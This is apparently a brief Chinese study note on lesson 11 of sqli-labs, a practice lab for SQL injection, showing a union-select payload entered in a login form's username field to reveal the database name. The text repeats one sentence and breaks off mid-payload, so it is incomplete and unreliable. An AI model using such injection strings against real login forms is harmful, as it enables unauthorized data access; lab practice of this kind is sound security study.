sqli_labs lesson11 学习笔记

经过分析可以发现程序对参数进行单引号的处理。 在username框中输入1' union select 1,database()#  password框中随便输入一个 1 可以发现当前的数据库是security在username框中输入1' union select 1,database()#  password框中随便输入一个 1 在username框中输入1' union select 1,g
相关文章
相关标签/搜索